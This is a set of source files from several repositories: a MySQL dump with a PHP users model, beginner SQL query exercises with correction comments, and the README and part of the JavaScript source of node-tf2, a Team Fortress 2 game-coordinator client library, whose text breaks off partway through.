-- Server version: 5.5.50
-- PHP version: 5.3.29

SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
SET time_zone = "+00:00";

-- The /*!40101 ... */ comments below are MySQL conditional statements and are
-- executed by servers >= 4.1.1; they save and restore the client charset.
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;

--
-- Database: `turbodealer_test`
--

-- --------------------------------------------------------

--
-- Table structure for table `users`
--

CREATE TABLE IF NOT EXISTS `users` (
  `id` int(10) unsigned NOT NULL,
  `name` varchar(250) DEFAULT '0',
  `surname` varchar(250) DEFAULT '0'
) ENGINE=InnoDB AUTO_INCREMENT=10 DEFAULT CHARSET=utf8;

--
-- Data dump for table `users`
--

INSERT INTO `users` (`id`, `name`, `surname`) VALUES
(1, 'Иван', 'Петров'),
(4, 'Петя', 'Шаляпин'),
(6, 'Киса', 'Брыся'),
(7, 'Виктор', 'Цой');

--
-- Indexes for dumped tables
--

--
-- Indexes for table `users`
--
ALTER TABLE `users`
  ADD PRIMARY KEY (`id`);

--
-- AUTO_INCREMENT for dumped tables
--

--
-- AUTO_INCREMENT for table `users`
--
ALTER TABLE `users`
  MODIFY `id` int(10) unsigned NOT NULL AUTO_INCREMENT,AUTO_INCREMENT=10;

/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
<file_sep><?php defined('SYSPATH') or die('No direct script access.');
/**
 * Data-access model for the `users` table, built on Kohana's query builder.
 */
class Model_Users extends Model
{
	/**
	 * Fetch the list of all existing users, ordered by id ascending.
	 * @return mixed Array of user rows
	 */
	public function getUsers()
	{
		$results = DB::select()
			->from("users")
			->order_by('id', 'Asc');

		return $results->execute()->as_array();
	}

	/**
	 * Fetch information about a specific user.
	 * @param $id User ID
	 * @return mixed Array with the matching row (empty when not found)
	 */
	public function getUser($id)
	{
		$results = DB::select()
			->from("users")
			->where('id', '=', $id);

		return $results->execute()->as_array();
	}

	/**
	 * Add a new user.
	 * @param $post Array with $_POST data (expects user_name and user_surname keys)
	 * @return object Insert result
	 */
	public function addUser($post)
	{
		// NOTE(review): inserting '' into the integer auto-increment `id`
		// column relies on MySQL's non-strict mode coercing it to auto —
		// confirm, or consider omitting the id column from the insert.
		$results = DB::insert("users", array('id', 'name', 'surname'))
			->values(array('', $post["user_name"], $post["user_surname"]));

		return $results->execute();
	}

	/**
	 * Update an existing user's information.
	 * @param $id User ID
	 * @param $put Array of user data like { user_name : 'Ivan', user_surname : 'Petrov' }
	 * @return object|boolean Update result; returns an error string when $id is empty
	 */
	public function editUser($id, $put)
	{
		if ($id == "") return "Пустой id.";

		$results = DB::update("users")
			->set(array(
					'name' => $put["user_name"],
					'surname' => $put["user_surname"],
				)
			)
			->where("id", "=", $id);

		return $results->execute();
	}

	/**
	 * Delete a user.
	 * @param $id ID of the user to delete
	 * @return object|boolean Delete result; returns an error string when $id is empty
	 */
	public function deleteUser($id)
	{
		if ($id == "") return "Пустой id .";

		$results = DB::delete("users")
			->where('id', '=', $id);

		return $results->execute();
	}
}
"Markdown",
"SQL",
"PHP"
] | 4 | Markdown | TigerSmile/turbodealer_test | 5c9e2ee96a5d49e7b36095c4d289ff97fb53acfc | a795d24684fe05d33ec98959c1bfd9638d969c91 |
refs/heads/main | <repo_name>ctdupuis/lab-sql-intro<file_sep>/artist.sql
-- Add 3 new artists to the artist table. (It already exists.)
-- FIX: rows are separated by commas (one row ended with a period, a syntax
-- error), and string literals use single quotes (double quotes are column
-- identifiers in PostgreSQL).
INSERT INTO artists (name)
VALUES
    ('<NAME>'),
    ('The Blue Stones'),
    ('Shinedown');

-- Select 10 artists in reverse alphabetical order.
SELECT * FROM artists ORDER BY name DESC LIMIT 10;

-- Select 5 artists in alphabetical order.
SELECT * FROM artists ORDER BY name ASC LIMIT 5;

-- Select all artists that start with the word 'Black'.
-- FIX: the wildcard goes AFTER the prefix; '%Black' matches names that END
-- with Black, while 'Black%' matches names that start with it.
SELECT * FROM artists WHERE name LIKE 'Black%';
SELECT * FROM artists WHERE name LIKE "%Black%";<file_sep>/person.sql
-- Create a table called person that records a person's id, name, age,
-- height (in cm), city, favorite_color. id should be an auto-incrementing
-- id/primary key (use type: SERIAL)
CREATE TABLE person (
    id SERIAL PRIMARY KEY,
    name VARCHAR(40),
    age INTEGER,
    height_cm FLOAT,
    city VARCHAR(40),
    favorite_color VARCHAR(20)
);

-- Add 5 different person into the person database. Remember to not include
-- the person_id because it should auto-increment.
-- FIX: the column list was missing the comma between city and favorite_color,
-- and one row had "24. 175" (a period) instead of "24, 175".
INSERT INTO person (name, age, height_cm, city, favorite_color)
VALUES
    ('Cody', 25, 172.72, 'Lafayette', 'red'),
    ('Clayton', 24, 175, 'Lafayette', 'blue'),
    ('Daravy', 30, 180, 'Lafayette', 'yellow'),
    ('Tim', 38, 171.35, 'Lafayette', 'red'),
    ('Emily', 21, 169.40, '<NAME>', 'purple');

-- Select all the person in the person table by height from tallest to shortest.
SELECT * FROM person ORDER BY height_cm DESC;

-- Select all the person in the person table by height from shortest to tallest.
SELECT * FROM person ORDER BY height_cm ASC;

-- Select all the person in the person table by age from oldest to youngest.
-- FIX: oldest first means the LARGEST age first, so sort descending.
SELECT * FROM person ORDER BY age DESC;

-- Select all the person in the person table older than age 20.
SELECT * FROM person WHERE age > 20;

-- Select all the person in the person table that are exactly 18.
SELECT * FROM person WHERE age = 18;

-- Select all the person in the person table that are less than 20 and older than 30.
-- FIX: no single age satisfies both conditions at once; OR returns the
-- intended rows (under 20 together with over 30).
SELECT * FROM person WHERE age < 20 OR age > 30;

-- Select all the person in the person table that are not 27 (use not equals).
SELECT * FROM person WHERE age != 27;

-- Select all the person in the person table where their favorite color is not red.
SELECT * FROM person WHERE favorite_color != 'red';

-- Select all the person in the person table where their favorite color is not red and is not blue.
SELECT * FROM person WHERE favorite_color != 'red' AND favorite_color != 'blue';

-- Select all the person in the person table where their favorite color is orange or green.
SELECT * FROM person WHERE favorite_color = 'orange' OR favorite_color = 'green';

-- Select all the person in the person table where their favorite color is orange, green or blue (use IN).
SELECT * FROM person WHERE favorite_color IN ('orange', 'green', 'blue');
SELECT * FROM person WHERE favorite_color IN ('yellow', 'purple');<file_sep>/group_by.sql
-- Find the sum of totals in the invoice table grouped by billing_state.
-- Include the grouping column so each sum is identifiable.
SELECT billing_state, SUM(total) FROM invoice GROUP BY billing_state;

-- Find the average track length (in milliseconds) by album. Order the table by the averages.
-- FIX: the original query never ordered by the average despite the instructions.
SELECT title, AVG(milliseconds) AS avg_length FROM track FULL OUTER JOIN album ON track.album_id = album.album_id GROUP BY album.title ORDER BY avg_length;

-- Find a count of how many albums the artists with the ids 8 and 22 have respectively. Use COUNT, WHERE/IN, and GROUP BY.
-- FIX: group by artist_id (not title) — grouping by title yields a count of 1
-- per album instead of one album count per artist.
SELECT artist_id, COUNT(*) FROM album WHERE artist_id IN (8, 22) GROUP BY artist_id;<file_sep>/update.sql
-- UPDATE table_name
-- SET column1 = value1, column2 = value2, ...
-- WHERE condition;

-- Find all customers with fax numbers and set those numbers to null.
-- FIX: restrict to rows that actually have a fax; the unrestricted UPDATE
-- touched every row in the table.
UPDATE customer SET fax = null WHERE fax IS NOT NULL;

-- Find all customers with no company (null) and set their company to "Self".
UPDATE customer SET company = 'Self' WHERE company IS NULL;

-- Find the customer Julia Barnett and change her last name to Thompson.
UPDATE customer SET last_name = 'Thompson' WHERE first_name = 'Julia' AND last_name = 'Barnett';

-- Find the customer with this email <EMAIL> and change his support rep to 4.
UPDATE customer SET support_rep_id = 4 WHERE email = '<EMAIL>';

-- Find all tracks that are the genre Metal and have no composer. Set the composer to "The darkness around us".
-- FIX: to discover the genre_id we must filter by name; filtering by
-- genre_id = 3 assumed the answer we were trying to find.
SELECT * FROM genre WHERE name = 'Metal'; -- To find the genre_id (3)
UPDATE track SET composer = 'The darkness around us' WHERE genre_id = 3 AND composer IS NULL;
-- SELECT * FROM track LEFT JOIN genre ON track.genre_id = genre.genre_id WHERE genre.name = 'Metal' AND composer IS NULL;<file_sep>/employee.sql
-- List all employee first and last names only that live in Calgary.
SELECT first_name, last_name FROM employee WHERE city = 'Calgary';

-- Find the birthdate for the youngest employee.
-- FIX: the youngest employee has the LATEST birthdate, so sort descending.
SELECT birth_date FROM employee ORDER BY birth_date DESC LIMIT 1;

-- Find the birthdate for the oldest employee.
-- FIX: the oldest employee has the EARLIEST birthdate, so sort ascending.
SELECT birth_date FROM employee ORDER BY birth_date ASC LIMIT 1;

-- Find everyone that reports to Nancy Edwards (use the ReportsTo column).
SELECT * FROM employee WHERE reports_to = 2;
-- You will need to query the employee table to find the id for Nancy Edwards
SELECT * FROM employee WHERE first_name = 'Nancy' AND last_name = 'Edwards';
-- id: 2

-- Count how many people live in Lethbridge.
-- FIX: single quotes for the string literal (double quotes are identifiers
-- in PostgreSQL).
SELECT COUNT(*) FROM employee WHERE city = 'Lethbridge';<file_sep>/orders.sql
-- Create a table called orders that records: order_id, person_id, product_name, product_price, quantity.
CREATE TABLE orders (
    id SERIAL PRIMARY KEY,
    person_id INTEGER NOT NULL,
    product_name VARCHAR(40),
    product_price FLOAT,
    quantity INTEGER
);

-- Add 5 orders to the orders table.
-- FIX: string literals use single quotes (double quotes are identifiers in
-- PostgreSQL, which SERIAL above implies).
INSERT INTO orders (person_id, product_name, product_price, quantity)
VALUES
    (1, '<NAME>', 14.99, 1),
    (2, 'iMac Desktop', 1299.99, 1),
    (2, 'Computer desk', 59.99, 2),
    (1, '<NAME>', 10.99, 4),
    (2, 'Apple AirPods', 119.99, 1);

-- Make orders for at least two different people.
-- ✔️
-- person_id should be different for different people.
-- ✔️

-- Select all the records from the orders table.
SELECT * FROM orders;

-- Calculate the total number of products ordered.
-- FIX: sum the quantities; COUNT(*) only counts order rows, not products.
SELECT SUM(quantity) FROM orders;

-- Calculate the total order price.
-- FIX: each line's cost is price * quantity; summing price alone ignores
-- multi-item lines.
SELECT SUM(product_price * quantity) FROM orders;

-- Calculate the total order price by a single person_id.
SELECT SUM(product_price) FROM orders WHERE person_id = 2; | d7514ec653aa39d1642ddca758f1f26a91380321 | [
"SQL"
] | 6 | SQL | ctdupuis/lab-sql-intro | 5830982f93c08dbb33476794353bd55f2a4c09a3 | 92c22e16f1e015df7942292eab7ace6da521923a |
refs/heads/master | <file_sep># Team Fortress 2 for Node.js
[](https://npmjs.com/package/tf2)
[](https://npmjs.com/package/tf2)
[](https://david-dm.org/DoctorMcKay/node-tf2)
[](https://github.com/DoctorMcKay/node-tf2/blob/master/LICENSE)
[](https://www.paypal.com/cgi-bin/webscr?cmd=_donations&business=N36YVAT42CZ4G&item_name=node%2dtf2¤cy_code=USD)
This module provides a very flexible interface for interacting with the [Team Fortress 2](http://store.steampowered.com)
Game Coordinator. It's designed to work with a [node-steam-user SteamUser](https://github.com/DoctorMcKay/node-steam-user) instance.
**You will need node-steam-user v4.2.0 or later and Node.js v8 or later to use node-tf2 v3.**
# Setup
First, install it from npm:
$ npm install tf2
Require the module and call its constructor with your SteamUser instance:
```js
const SteamUser = require('steam-user');
const TeamFortress2 = require('tf2');
let user = new SteamUser();
let tf2 = new TeamFortress2(user);
```
To initialize your GC connection, just launch TF2 via SteamUser normally:
```js
user.gamesPlayed([440]);
```
node-tf2 will emit a `connectedToGC` event when the game coordinator connection has been successfully established.
You shouldn't try to do anything before you receive that event.
# Enums
There are some enums that are used by various methods and events. You can find them in `enums.js`.
# Properties
There are a few useful read-only properties available to you.
### haveGCSession
`true` if we're currently connected to the GC, `false` otherwise. You should only call methods when we have an active GC session.
### itemSchema
After `itemSchemaLoaded` is emitted, this is the object representation of the parsed items_game.txt file. Before that point, this is undefined.
### backpack
After `backpackLoaded` is emitted, this is an array containing the contents of our backpack. Before that point, this is undefined.
### premium
`true` if this account is Premium, `false` if it's F2P. This value is defined right before `accountLoaded` is emitted.
### backpackSlots
The maximum number of items your backpack can hold. This value is defined right before `accountLoaded` is emitted.
### canSendProfessorSpeks
`true` if you can call `sendProfessorSpeks` to send the [Professor Speks](http://wiki.teamfortress.com/wiki/Professor_Speks) item to another user. This value is defined right before `accountLoaded` is emitted.
# Methods
### Constructor(steamClient)
When instantiating your node-tf2 instance, you need to pass your active SteamUser instance as the sole parameter, as shown here:
```js
let tf2 = new TeamFortress2(steamUser);
```
### setLang(localizationFile)
Call this method with the contents of an up-to-date localization file of your chosen language if you want localized events to be emitted. You can find the localization files under `tf/resource/tf_[language].txt`.
You can call this at any time, even when disconnected. If you get an updated localization file, you can call this again to update the cached version.
### craft(items[, recipe])
Craft `items` together into a new item, optionally using a specific `recipe`. The `recipe` parameter is optional and you don't normally need to specify it. `items` should be an array of item IDs to craft.
### removeItemPaint(item)
Removes item paint. `item` should be item's id
### removeCustomTexture(item)
Removes custom texture (war paints?). `item` should be item's id
### removeMakersMark(item)
Removes the crafter's name. `item` should be item's id
### removeItemKillstreak(item)
Removes the killstreaks from item. `item` should be item's id
### removeItemGiftedBy(item)
Removes the `Gifted by` attribute from item. `item` should be item's id
### removeItemFestivizer(item)
Removes the festivizer from item. `item` should be item's id
### requestInventoryRefresh()
Refresh TF2 inventory without leaving and entering game
**Not working (?)**
### trade(steamID)
Sends an in-game trade request to `steamID`. The other player must be playing TF2 currently. Listen for the `tradeResponse`
event for their response. If they accept, node-steam-user will emit
[`tradeRequest`](https://github.com/DoctorMcKay/node-steam-user#traderequest) and you can start the trade with
[node-steam-trade](https://github.com/seishun/node-steam-trade).
### cancelTradeRequest()
Cancels your current pending trade request. You can only send one trade request at a time so there is no need to pass any sort of identifier.
### respondToTrade(tradeID, accept)
Responds to an incoming trade request identified by `tradeID`. Pass `true` for `accept` to accept the trade request, or `false` to decline it.
### setStyle(item, style)
Sets the current `style` of an `item`. The `item` parameter should be an item ID, and the `style` parameter is the index of the desired style.
### setPosition(item, position)
Sets the `position` of an `item` in the backpack. The first slot on page 1 is position 1. `item` should be an item ID.
### deleteItem(item)
Deletes an `item`. The `item` parameter should be the ID of the item to delete. **This is a destructive operation.**
### wrapItem(wrapID, itemID)
Wraps the item with ID `itemID` using the gift wrap with ID `wrapID`.
### deliverGift(gift, steamID)
Sends a `gift` to a recipient with a `steamID`. The recipient doesn't need to be playing TF2. `gift` should be the ID of the wrapped gift item.
### unwrapGift(gift)
Unwraps a `gift`. The `gift` parameter should be the ID of a received wrapped gift item.
### useItem(item)
Generically use an item. The `item` parameter should be an item ID.
### sortBackpack(sortType)
Sorts your backpack. `sortType` is the ID of the type of sort you want.
`0`: No sort, `1`: By rarity, `2`: By type, `3`: By class, `4`: By slot, `5`: By date
### sendProfessorSpeks(steamID)
If you're premium and you haven't sent them yet, this will thank a "helpful user" and grant them [Professor Speks](http://wiki.teamfortress.com/wiki/Professor_Speks). If they already have Speks, this will increment their "New Users Helped" counter.
The `steamID` parameter should be the recipient's 64-bit steamID. The recipient does not need to be on your friends list or in-game.
### createServerIdentity()
Creates a new GC gameserver identity account ID and token. Equivalent to running cl_gameserver_create_identity in the TF2 console. Listen for the `createIdentity` event for a response.
### getRegisteredServers()
Requests a list of your GC gameserver identities. Equivalent to running cl_gameserver_list in the TF2 console. Listen for the `registeredServers` event for the response.
### resetServerIdentity(id)
Resets the token of the server identified by a given `id`. This will make the GC generate a new token, invaliding the old one. Listen for the `resetIdentity` event for the response.
### openCrate(keyID, crateID)
Opens a crate with `crateID` using a key with `keyID`. If successful, you'll get two `itemRemoved` events, one for the key and one for the crate, followed by an `itemAcquired` event for what you received.
### requestWarStats([warID][, callback])
- `warID` - A [war ID](https://github.com/DoctorMcKay/node-tf2/blob/3fa354b2c1224b5885d9b9eb2818d17f76454cd7/enums.js#L78-L80) (defaults to HeavyVsPyro)
- `callback` - Identical to [`warStats`](#warstats) event
Requests global stats for a particular War.
# Events
### connectedToGC
- `version` - The current version reported by the GC
Emitted when a GC connection is established. You shouldn't use any methods before you receive this. Note that this may be received (after it's first emitted) without any disconnectedFromGC event being emitted. In this case, the GC simply restarted.
### disconnectedFromGC
- `reason` - The reason why we disconnected from the GC. This value is one of the values in the `GCGoodbyeReason` enum. If the value is unknown, you'll get a string representation instead.
Emitted when we disconnect from the GC. You shouldn't use any methods until `connectedToGC` is emitted.
### itemSchema
- `version` - The current version of the schema as a hexadecimal string
- `itemsGameUrl` - The URL to the current items_game.txt
Emitted when we get an updated item schema from the GC. node-tf2 will automatically download and parse the updated items_game.txt and will emit `itemSchemaLoaded` when complete.
### itemSchemaLoaded
Emitted when the up-to-date items_game.txt has been downloaded and parsed. It's available as `tf2.itemSchema`.
### itemSchemaError
- `err` - The error that occurred
Emitted if there was an error when downloading items_game.txt.
### systemMessage
- `message` - The message that was broadcast
Emitted when a system message is sent by Valve. In the official client, this is displayed as a regular pop-up notification box and in chat, and is accompanied by a beeping sound.
System messages are broadcast rarely and usually concern item server (GC) downtime.
### displayNotification
- `title` - Notification title (currently unused)
- `body` - Notification body text
Emitted when a GC-to-client notification is sent. In the official client, this is displayed as a regular pop-up notification box. Currently, this is only used for broadcasting Something Special For Someone Special acceptance messages.
Notifications have a valid and non-empty `title`, but the official client doesn't display it.
**This won't be emitted unless you call `setLang` with a valid localization file.**
### itemBroadcast
- `message` - The message text that is rendered by clients. This will be `null` if you haven't called `setLang` with a valid localization file or if the schema isn't loaded.
- `username` - The name of the user that received/deleted an item
- `wasDestruction` - `true` if the user deleted their item, `false` if they received it
- `defindex` - The definition index of the item that was received/deleted
Emitted when an item broadcast notification is sent. In the official client, the `message` is displayed as a regular pop-up notification box. Currently, this is only used for broadcasting Golden Frying Pan drops/deletions.
### tradeRequest
- `steamID` - A [`SteamID`](https://www.npmjs.com/package/steamid) object of the user who sent a trade request
- `tradeID` - A unique numeric identifier that's used to respond to the request (via `respondToTrade`)
Emitted when someone sends us a trade request. Use `respondToTrade` to accept or decline it.
### tradeResponse
- `response` - The response code. This is a value in the `TradeResponse` enum.
- `tradeID` - If `response` is `TradeResponse.Cancel`, this is the tradeID of the trade request that was canceled.
Emitted when a response is received to a `trade` call, or someone cancels an incoming trade request.
### backpackLoaded
Emitted when the GC has sent us the contents of our backpack. From this point forward, backpack contents are available as a `tf2.backpack` property, which is an array of item objects. The array is in no particular order, use the `position` property of each item to determine its backpack slot.
### accountLoaded
Emitted when the GC has sent us metadata about our account. Right before this is emitted, node-tf2 will define the `premium`, `backpackSlots`, and `canSendProfessorSpeks` properties. This event indicates that those properties are now available.
### accountUpdate
- `oldData` - An object representing the previous value of whatever properties changed
Emitted when the GC notifies us that something about our account has changed. One or more of the `premium`, `backpackSlots`, or `canSendProfessorSpeks` properties will have changed right before this event is emitted. The previous value of whatever properties changed is available via `oldData`.
For example, if our account has just upgraded to premium, this would be `oldData`:
```json
{
"premium": false,
"backpackSlots": 50
}
```
The `premium` property of node-tf2 would now be true and the `backpackSlots` property would now be 300.
### itemAcquired
- `item` - The item that was acquired
Emitted when we receive a new item. `item` is the item that we just received, and `tf2.backpack` is updated before the event is emitted.
### itemChanged
- `oldItem` - The old item data
- `newItem` - The new item data
Emitted when an item in our backpack changes (e.g. style update, position changed, etc.).
### itemRemoved
- `item` - The item that was removed
Emitted when an item is removed from our backpack. The `tf2.backpack` property is updated before this is emitted.
### craftingComplete
- `recipe` - The ID of the recipe that was used to perform this craft, or -1 on failure
- `itemsGained` - An array of IDs of items that were gained as a result of this craft
Emitted when a craft initiated by the `craft` method finishes.
### professorSpeksReceived
- `steamID` - A [`SteamID`](https://www.npmjs.com/package/steamid) object of the user who sent us <NAME>
Emitted when someone else thanks us and sends us <NAME> (increments our "New Users Helped" counter if we already have them).
### professorSpeksSent
Emitted when we successfully send <NAME> to someone else.
### createIdentity
- `status` - The status of this request, from the values in the enum below.
- `created` - `true` if the identity was successfully created
- `id` - The ID of the newly-created identity
- `token` - The authentication token of the newly-created identity
Emitted when the GC sends us back the response of a `createServerIdentity()` call. The `status` value will be from the following enum:
enum EStatus {
kStatus_GenericFailure = 0;
kStatus_TooMany = -1;
kStatus_NoPrivs = -2;
kStatus_Created = 1;
}
### registeredServers
- `servers` - An array of objects representing our owned server identities
Emitted when the GC sends us back the response of a `getRegisteredServers()` call. Each item in the `servers` array will be an object that looks like this:
```json
{
"game_server_account_id": 291516,
"game_server_identity_token": "T<PASSWORD>",
"game_server_standing": 0,
"game_server_standing_trend": 2
}
```
### resetIdentity
- `reset` - `true` if the token was successfully reset
- `id` - The ID of the identity for which we reset the token
- `token` - The new token associated with the given ID
Emitted when the GC sends us back the response of a `resetServerIdentity(id)` call.
### warStats
- `scores` - An object where the keys are [side indexes](https://github.com/DoctorMcKay/node-tf2/blob/3fa354b2c1224b5885d9b9eb2818d17f76454cd7/enums.js#L82-L85) and values are scores.
Emitted when the GC sends us back the response of a `requestWarStats()` call.
<file_sep>const ByteBuffer = require('bytebuffer');
const EventEmitter = require('events').EventEmitter;
const SteamID = require('steamid');
const Util = require('util');
const VDF = require('vdf');
const Language = require('./language.js');
const Schema = require('./protobufs/generated/_load.js');
const STEAM_APPID = 440;
module.exports = TeamFortress2;
Util.inherits(TeamFortress2, EventEmitter);
/**
 * Interface to the Team Fortress 2 Game Coordinator.
 * @param {object} steam - A node-steam-user instance (v4.2.0 or later)
 * @constructor
 */
function TeamFortress2(steam) {
	// Sanity-check that we were handed a compatible node-steam-user instance;
	// v3 of this module depends on its sendToGC/receivedFromGC API.
	if (steam.packageName != 'steam-user' || !steam.packageVersion || !steam.constructor) {
		throw new Error('tf2 v3 only supports steam-user v4.2.0 or later.');
	} else {
		// FIX: compare (major, minor) numerically and correctly. The previous
		// check `parts[0] < 4 || parts[1] < 2` compared strings and wrongly
		// rejected any version whose minor component is below 2 (e.g. 5.0.x).
		let parts = steam.packageVersion.split('.').map(Number);
		if (parts[0] < 4 || (parts[0] == 4 && parts[1] < 2)) {
			throw new Error(`node-tf2 v3 only supports node-steam-user v4.2.0 or later. ${steam.constructor.name} v${steam.packageVersion} given.`);
		}
	}

	this._steam = steam;
	this.haveGCSession = false; // true once the GC has welcomed us
	this._isInTF2 = false;      // true while TF2 (appid 440) is launched

	// Dispatch raw GC messages to the handlers registered on this._handlers.
	this._steam.on('receivedFromGC', (appid, msgType, payload) => {
		if (appid != STEAM_APPID) {
			return; // we don't care
		}

		// node-steam-user hands protobuf payloads through decoded; raw
		// payloads arrive as Buffers.
		let isProtobuf = !Buffer.isBuffer(payload);
		let handler = null;

		if (this._handlers[msgType]) {
			handler = this._handlers[msgType];
		}

		// Resolve the numeric message type to its enum name for debug output.
		let msgName = msgType;
		for (let i in Language) {
			if (Language.hasOwnProperty(i) && Language[i] == msgType) {
				msgName = i;
				break;
			}
		}

		this.emit('debug', "Got " + (handler ? "handled" : "unhandled") + " GC message " + msgName + (isProtobuf ? " (protobuf)" : ""));

		if (handler) {
			// Raw payloads are wrapped in a little-endian ByteBuffer for the handler.
			handler.call(this, isProtobuf ? payload : ByteBuffer.wrap(payload, ByteBuffer.LITTLE_ENDIAN));
		}
	});

	// Kick off the GC handshake as soon as TF2 is launched.
	this._steam.on('appLaunched', (appid) => {
		if (this._isInTF2) {
			return; // we don't care if it was launched again
		}

		if (appid == STEAM_APPID) {
			this._isInTF2 = true;
			if (!this.haveGCSession) {
				this._connect();
			}
		}
	});

	// Shared teardown used when the game quits, we disconnect, or we error out.
	let handleAppQuit = (emitDisconnectEvent) => {
		if (this._helloInterval) {
			clearInterval(this._helloInterval);
			this._helloInterval = null;
		}

		if (this.haveGCSession && emitDisconnectEvent) {
			this.emit('disconnectedFromGC', TeamFortress2.GCGoodbyeReason.NO_SESSION);
		}

		this.haveGCSession = false;
	};

	this._steam.on('appQuit', (appid) => {
		if (!this._isInTF2) {
			return;
		}

		if (appid == STEAM_APPID) {
			handleAppQuit(false);
		}
	});

	this._steam.on('disconnected', () => {
		handleAppQuit(true);
	});

	this._steam.on('error', (err) => {
		handleAppQuit(true);
	});
}
/**
 * Begins the GC handshake: sends a ClientHello/ServerHello every 5 seconds
 * until the GC welcomes us (haveGCSession flips to true).
 * @private
 */
TeamFortress2.prototype._connect = function() {
	// Nothing to do if TF2 isn't running, or a hello loop is already active.
	if (!this._isInTF2 || this._helloInterval) {
		return;
	}

	let sayHello = () => {
		if (this.haveGCSession) {
			// Handshake complete; stop pestering the GC.
			clearInterval(this._helloInterval);
			this._helloInterval = null;
			return;
		}

		// Gameserver accounts greet with ServerHello; everyone else with ClientHello.
		let asServer = this._isServer();
		this._send(
			asServer ? Language.ServerHello : Language.ClientHello,
			asServer ? Schema.CMsgServerHello : Schema.CMsgClientHello,
			{}
		);
	};

	this._helloInterval = setInterval(sayHello, 5000);
	sayHello();
};
/**
 * Determines whether the logged-on account is a gameserver account.
 * @returns {boolean|*} Truthy when the SteamID is a (possibly anonymous) gameserver
 * @private
 */
TeamFortress2.prototype._isServer = function() {
	let sid = this._steam.steamID;
	return sid && (sid.type == SteamID.Type.ANON_GAMESERVER || sid.type == SteamID.Type.GAMESERVER);
};
/**
 * Sends a message to the GC.
 * @param {number} type - Message type (a value from Language)
 * @param {object|null} protobuf - The protobuf class for this message, or null for raw messages
 * @param {object|ByteBuffer} body - Plain object (protobuf) or ByteBuffer (raw)
 * @returns {boolean} false when we aren't logged on, true when the message was handed to steam-user
 * @private
 */
TeamFortress2.prototype._send = function(type, protobuf, body) {
	// Can't send anything until we're logged on.
	if (!this._steam.steamID) {
		return false;
	}

	// Resolve the numeric message type back to its enum name for debug output.
	let msgName = Object.keys(Language).find(key => Language[key] == type) || type;
	this.emit('debug', "Sending GC message " + msgName);

	if (protobuf) {
		this._steam.sendToGC(STEAM_APPID, type, {}, protobuf.encode(body).finish());
	} else {
		// Raw (non-protobuf) messages arrive here as a ByteBuffer.
		this._steam.sendToGC(STEAM_APPID, type, null, body.flip().toBuffer());
	}

	return true;
};
/**
 * Caches a localization file so localized events (e.g. displayNotification)
 * can be emitted. May be called again at any time with an updated file.
 * @param {string} langFile - Contents of tf/resource/tf_[language].txt (VDF/KeyValues)
 */
TeamFortress2.prototype.setLang = function(langFile) {
	let parsed = VDF.parse(langFile);
	// The vdf parser mangles the root "lang" key with stray quote characters,
	// so locate the root node by iterating instead of addressing it by name.
	Object.keys(parsed).forEach((rootKey) => {
		this.lang = parsed[rootKey].Tokens;
	});
};
/**
 * Crafts a set of items together, optionally using a specific recipe.
 * @param {Array} items - Item IDs to consume
 * @param {number} [recipe] - Recipe ID; omitted/falsy means wildcard (-2)
 */
TeamFortress2.prototype.craft = function(items, recipe) {
	// Wire layout: int16 recipe, int16 item count, then one uint64 per item ID.
	let payload = new ByteBuffer(4 + 8 * items.length, ByteBuffer.LITTLE_ENDIAN);
	payload.writeInt16(recipe || -2); // -2 = wildcard (let the GC pick the recipe)
	payload.writeInt16(items.length);
	for (let itemID of items) {
		payload.writeUint64(coerceToLong(itemID));
	}
	this._send(Language.Craft, null, payload);
};
/**
 * Sends an in-game trade request; the other player must be playing TF2.
 * Listen for the tradeResponse event for their answer.
 * @param {SteamID|string} steamID - Recipient, as a SteamID object or 64-bit string
 */
TeamFortress2.prototype.trade = function(steamID) {
	// Accept either a SteamID object or a 64-bit SteamID string.
	let sid = typeof steamID == 'string' ? new SteamID(steamID) : steamID;

	let payload = new ByteBuffer(12, ByteBuffer.LITTLE_ENDIAN);
	payload.writeUint32(0); // leading uint32 is always zero
	payload.writeUint64(coerceToLong(sid.getSteamID64()));
	this._send(Language.Trading_InitiateTradeRequest, null, payload);
};
/**
 * Removes the custom name from an item.
 * @param {number|string} item - The item's ID
 */
TeamFortress2.prototype.removeItemName = function(item){
	// Payload: uint64 item ID followed by one bool byte (false = name).
	let buffer = new ByteBuffer(9, ByteBuffer.LITTLE_ENDIAN);
	// FIX: coerce the ID like every other item-ID writer in this file, so
	// string IDs are handled consistently.
	buffer.writeUint64(coerceToLong(item));
	buffer.writeUint8(0); // false = operate on the name, not the description
	this._send(Language.RemoveItemName, null, buffer);
};
/**
 * Removes the custom description from an item.
 * @param {number|string} item - The item's ID
 */
TeamFortress2.prototype.removeItemDescription = function(item){
	// Payload: uint64 item ID followed by one bool byte (true = description).
	let buffer = new ByteBuffer(9, ByteBuffer.LITTLE_ENDIAN);
	buffer.writeUint64(coerceToLong(item)); // coerce like the other item-ID writers
	// BUG FIX: this flag must be 1 (true) to target the description; the
	// previous value of 0 made this call identical to removeItemName, as the
	// original comment ("set to true for description") already implied.
	buffer.writeUint8(1);
	this._send(Language.RemoveItemName, null, buffer);
};
// --- Customization removal helpers ------------------------------------------
// Each helper strips one customization attribute from an item by sending a
// CMsgGCRemoveCustomizationAttributeSimple message carrying the item's ID.

/** Removes paint from an item. @param item - The item's ID */
TeamFortress2.prototype.removeItemPaint = function(item) {
	this._send(Language.RemoveItemPaint, Schema.CMsgGCRemoveCustomizationAttributeSimple, {item_id: item});
};

/** Removes a custom texture from an item. @param item - The item's ID */
TeamFortress2.prototype.removeCustomTexture = function(item) {
	this._send(Language.RemoveCustomTexture, Schema.CMsgGCRemoveCustomizationAttributeSimple, {item_id: item});
};

/** Removes the crafter's name ("maker's mark") from an item. @param item - The item's ID */
TeamFortress2.prototype.removeMakersMark = function(item) {
	this._send(Language.RemoveMakersMark, Schema.CMsgGCRemoveCustomizationAttributeSimple, {item_id: item});
};

/** Removes killstreaks from an item. @param item - The item's ID */
